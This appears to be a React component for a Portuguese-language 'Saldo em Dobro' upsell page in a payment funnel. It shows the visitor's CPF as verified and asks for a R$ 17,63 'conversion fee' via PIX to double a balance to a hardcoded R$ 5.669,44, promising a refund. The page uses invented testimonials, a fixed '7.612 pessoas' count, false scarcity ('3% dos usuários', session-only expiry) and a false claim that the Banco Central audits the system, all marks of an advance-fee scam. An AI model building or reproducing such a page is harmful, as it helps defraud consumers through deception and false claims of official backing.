import { useState } from "react";
import { Loader2, Check, ChevronDown, ChevronUp } from "lucide-react";
import StickyCtaBar from "./StickyCtaBar";
import testimonial1 from "@/assets/testimonial-1.jpg";
import testimonial2 from "@/assets/testimonial-2.jpg";
import testimonial3 from "@/assets/testimonial-3.jpg";

interface FunnelUpsellSaldoDuplicadoProps { balance: string; onGeneratePix: () => void; isGenerating: boolean; leadCpf?: string; leadName?: string; }
const FaqItem = ({ question, answer }: { question: string; answer: string }) => { const [open, setOpen] = useState(false); return (<div className="bg-white rounded-lg border border-gray-100 overflow-hidden"><button onClick={() => setOpen(!open)} className="w-full flex items-center justify-between p-3 text-left"><span className="text-gray-800 text-xs font-semibold pr-2">{question}</span>{open ? <ChevronUp className="w-4 h-4 text-gray-400 shrink-0" /> : <ChevronDown className="w-4 h-4 text-gray-400 shrink-0" />}</button>{open && <div className="px-3 pb-3 pt-0"><p className="text-gray-500 text-[11px] leading-relaxed">{answer}</p></div>}</div>); };
const TestimonialCard = ({ img, name, location, text, amount }: { img: string; name: string; location: string; text: string; amount: string }) => (<div className="bg-white rounded-lg p-3 border border-gray-100"><div className="flex items-center gap-2 mb-2"><img src={img} alt={name} loading="lazy" className="w-8 h-8 rounded-full object-cover" /><div><p className="text-gray-800 text-xs font-semibold">{name}</p><p className="text-gray-400 text-[10px]">{location}</p></div><span className="ml-auto text-green-600 text-[10px] font-bold">+{amount}</span></div><p className="text-gray-500 text-[11px] leading-relaxed">"{text}"</p></div>);

const FunnelUpsellSaldoDuplicado = ({ balance, onGeneratePix, isGenerating, leadCpf, leadName }: FunnelUpsellSaldoDuplicadoProps) => {
  return (
    <div className="fixed inset-0 z-[80] bg-[#F0F2F5] overflow-y-auto">
      <div className="bg-[#1B5E20] py-3 px-4"><h1 className="text-white text-sm font-bold text-center tracking-wide flex items-center justify-center gap-2">💰 PROMOÇÃO EXCLUSIVA — SALDO EM DOBRO</h1></div>
      <main className="px-3 py-4 max-w-lg mx-auto pb-24">
        {leadCpf && (<div className="bg-white rounded-xl p-3 mb-3 shadow-sm flex items-center gap-3 border border-green-100"><div className="w-8 h-8 rounded-full bg-green-50 flex items-center justify-center shrink-0"><span className="text-sm">🪪</span></div><div className="flex-1"><p className="text-gray-800 text-xs font-semibold">{leadName || "Titular"}</p><p className="text-gray-400 text-[11px]">CPF: {leadCpf}</p></div><span className="text-green-600 text-[10px] font-bold">Verificado ✓</span></div>)}
        <div className="bg-[#E8F5E9] border border-[#66BB6A] rounded-xl p-4 mb-3"><div className="flex items-start gap-2"><span className="text-lg leading-none mt-0.5">🎯</span><div><p className="text-gray-900 text-sm font-bold mb-1">Você foi selecionado para a promoção Saldo em Dobro</p><p className="text-gray-700 text-xs leading-relaxed">Apenas <span className="font-bold text-green-700">3% dos usuários</span> são elegíveis. Essa oferta é válida somente nesta sessão.</p></div></div></div>
        <div className="bg-white rounded-xl p-5 shadow-sm mb-3">
          <div className="flex justify-center mb-3"><span className="bg-green-50 text-green-700 text-[10px] font-bold px-3 py-1 rounded-full border border-green-200 animate-pulse">✨ OFERTA LIMITADA — EXPIRA EM BREVE</span></div>
          <div className="grid grid-cols-2 gap-3 mb-4">
            <div className="bg-gray-50 rounded-lg p-3 border border-gray-200 text-center"><p className="text-gray-400 text-[10px] mb-1">SALDO ATUAL</p><p className="text-gray-900 text-lg font-black">{balance}</p><p className="text-gray-400 text-[10px]">Valor padrão</p></div>
            <div className="bg-green-50 rounded-lg p-3 border border-green-200 text-center relative"><span className="absolute -top-2 left-1/2 -translate-x-1/2 bg-green-500 text-white text-[9px] font-bold px-2 py-0.5 rounded-full">2X</span><p className="text-gray-400 text-[10px] mb-1">COM DUPLICAÇÃO</p><p className="text-green-700 text-lg font-black">R$ 5.669,44</p><p className="text-green-600 text-[10px] font-semibold">Saldo dobrado</p></div>
          </div>
          <p className="text-gray-600 text-xs font-bold mb-2">Como funciona:</p>
          <div className="space-y-2 mb-4">{[{ n: "1", t: "Você ativa a duplicação pagando a taxa de conversão de R$ 17,63" }, { n: "2", t: "O sistema aplica o multiplicador 2x ao seu saldo atual" }, { n: "3", t: "Você recebe R$ 5.669,44 via PIX + reembolso da taxa" }].map((s, i) => (<div key={i} className="flex items-start gap-2"><div className="w-5 h-5 rounded-full bg-green-100 flex items-center justify-center shrink-0 mt-0.5"><span className="text-[10px] font-bold text-green-700">{s.n}</span></div><p className="text-gray-700 text-xs leading-relaxed"><span className="font-bold">{s.t}</span></p></div>))}</div>
          <div className="space-y-2 mb-4">{["Duplicação instantânea — processado em menos de 2 minutos", "Taxa 100% reembolsável — devolvida junto com o saldo duplicado", "Oferta única e intransferível — vinculada ao seu CPF nesta sessão"].map((t, i) => (<div key={i} className="flex items-start gap-2"><Check className="w-4 h-4 text-green-500 mt-0.5 shrink-0" /><p className="text-gray-700 text-xs leading-relaxed"><span className="font-bold">{t}</span></p></div>))}</div>
          <div className="bg-gray-50 rounded-lg p-3 mb-4 border border-gray-100"><div className="flex items-center justify-between mb-1"><span className="text-gray-500 text-[11px]">Taxa de conversão:</span><span className="text-gray-900 text-sm font-bold">R$ 17,63</span></div><div className="flex items-center justify-between mb-1"><span className="text-gray-500 text-[11px]">Reembolso automático:</span><span className="text-green-600 text-[11px] font-bold">✓ Em até 2 min</span></div><div className="flex items-center justify-between pt-1 border-t border-gray-200"><span className="text-gray-700 text-[11px] font-bold">Total que você recebe:</span><span className="text-green-700 text-sm font-black">R$ 5.669,44</span></div></div>
          <p className="text-gray-400 text-[10px] text-center mt-2">🔒 Pagamento seguro via PIX • Reembolso garantido</p>
          <p className="text-gray-500 text-[11px] text-center leading-relaxed mt-3"><span className="font-bold text-gray-700">7.612 pessoas</span> já duplicaram o saldo nos últimos 7 dias.</p>
        </div>
        <div className="mb-3"><p className="text-gray-600 text-xs font-bold text-center mb-2">Perguntas frequentes</p><div className="space-y-2"><FaqItem question="Como funciona a duplicação de saldo?" answer="O sistema aplica um multiplicador 2x ao seu saldo atual. Ao ativar a conversão, seu saldo é multiplicado para R$ 5.669,44." /><FaqItem question="Por que preciso pagar R$ 17,63?" answer="A taxa cobre o custo da conversão no módulo de multiplicação do sistema. É 100% reembolsável." /><FaqItem question="Posso ativar a duplicação depois?" answer="Não. A promoção Saldo em Dobro é vinculada à sua sessão atual. Se avançar sem ativar, a oferta expira permanentemente." /></div></div>
        <div className="mb-3"><p className="text-gray-600 text-xs font-bold text-center mb-2">Quem duplicou, recebeu em dobro</p><div className="space-y-2"><TestimonialCard img={testimonial1} name="Thiago R." location="Goiânia, GO" text="Não acreditei quando vi a oferta de duplicar. Ativei e em 2 minutos caiu o dobro do saldo na minha conta." amount="R$ 5.669,44" /><TestimonialCard img={testimonial2} name="Camila B." location="Fortaleza, CE" text="Quase deixei passar achando que não era real. Minha irmã me convenceu a ativar e recebi tudo duplicado." amount="R$ 5.669,44" /><TestimonialCard img={testimonial3} name="Rafael N." location="Florianópolis, SC" text="Já tinha recebido o saldo normal antes. Dessa vez apareceu a duplicação e eu ativei na hora." amount="R$ 5.669,44" /></div></div>
        <div className="text-center pb-6"><p className="text-gray-400 text-[10px]">Sistema de conversão auditado pelo Banco Central</p></div>
      </main>
      <StickyCtaBar onClick={onGeneratePix} isGenerating={isGenerating} label="Duplicar Meu Saldo para R$ 5.669,44" bgColor="bg-[#1B5E20]" shadowColor="shadow-green-200" />
    </div>
  );
};

export default FunnelUpsellSaldoDuplicado;
